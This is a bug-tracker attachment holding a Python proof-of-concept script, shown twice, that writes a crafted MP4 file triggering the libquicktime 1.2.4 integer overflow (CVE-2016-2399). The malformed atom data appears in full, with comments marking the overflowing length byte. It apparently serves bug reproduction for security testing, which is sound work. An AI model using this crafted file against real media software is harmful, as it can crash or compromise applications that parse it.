Attachment 9010 Details for Bug 20357 – Python script to generate PoC data file

Python script to generate PoC data file

reproducer_data.py (text/plain), 3.67 KB, created by Len Lawrence on 2017-03-02 23:12:48 CET

(hide)

Description:

Filename:

MIME Type:

Creator: Len Lawrence

Created: 2017-03-02 23:12:48 CET

Size: 3.67 KB

patch

obsolete

>#!/usr/bin/env python
>#
># Author: Marco Romano - @nemux_ http://www.nemux.org
># libquicktime 1.2.4 Integer Overflow
>#
># Product Page: http://libquicktime.sourceforge.net/
># Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
># Affected products: All products using libquicktime version <= 1.2.4
>#
># CVE-ID: CVE-2016-2399 
>#
>########
>import sys  
>import struct  
>import binascii
>
>"""
>There needs to be an mp4 file with these nested atoms to trigger the bug:  
>moov -> trak -> mdia -> hdlr  
>"""
>hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"  
>             "6D6F6F76"               #### moov atom
>             "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
>             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
>             "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
>             "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
>             "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
>             "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
>             "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" 
>             "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
>             "7472616B"               #### trak atom
>             "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
>             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
>             "6D646961"               #### mdia atom 
>             "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
>             "4E"                     #### hdlr atom length
>             "68646C72"               #### hdlr atom
>             "0000000000"
>             "4141414141414141"       #### our airstrip :)
>             "0000000000000000000000" 
>             "EC"                     #### 236 > 127 <-- overflow here and a change in signedness too 
>             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
>             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
>             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
>             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
>             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
>
>hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
>
>def createPoC():  
>    try:
>        with open("./nemux.mp4","wb") as output:
>            output.write(hax0r_mp4)
>        print "[*] The PoC is done!"
>    except Exception,e: 
>        print str(e)
>        print "[*] mmmm!"
>
>def usage():  
>    print "\nUsage? Run it -> " + sys.argv[0]
>    print "this poc creates an mp4 file named nemux.mp4"
>    print "--------------------------------------------"
>    print "This dummy help? " + sys.argv[0] + " help\n" 
>    sys.exit()
>
>if __name__ == "__main__":  
>    try:
>        if len(sys.argv) == 2:
>            usage()
>        else:
>            print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
>            print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
>            createPoC();
>    except Exception,e: 
>        print str(e)
>        print "Ok... Something went wrong..."
>        sys.exit()

#!/usr/bin/env python
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399 
#
########
import sys  
import struct  
import binascii

"""
There needs to be an mp4 file with these nested atoms to trigger the bug:  
moov -> trak -> mdia -> hdlr  
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"  
             "6D6F6F76"               #### moov atom
             "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
             "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
             "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
             "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
             "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
             "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" 
             "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
             "7472616B"               #### trak atom
             "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
             "6D646961"               #### mdia atom 
             "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
             "4E"                     #### hdlr atom length
             "68646C72"               #### hdlr atom
             "0000000000"
             "4141414141414141"       #### our airstrip :)
             "0000000000000000000000" 
             "EC"                     #### 236 > 127 <-- overflow here and a change in signedness too 
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010"
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")

hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))

def createPoC():  
    try:
        with open("./nemux.mp4","wb") as output:
            output.write(hax0r_mp4)
        print "[*] The PoC is done!"
    except Exception,e: 
        print str(e)
        print "[*] mmmm!"

def usage():  
    print "\nUsage? Run it -> " + sys.argv[0]
    print "this poc creates an mp4 file named nemux.mp4"
    print "--------------------------------------------"
    print "This dummy help? " + sys.argv[0] + " help\n" 
    sys.exit()

if __name__ == "__main__":  
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
            print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
            createPoC();
    except Exception,e: 
        print str(e)
        print "Ok... Something went wrong..."
        sys.exit()

Actions: View

Attachments on bug 20357: 9010 | 9011 | 9012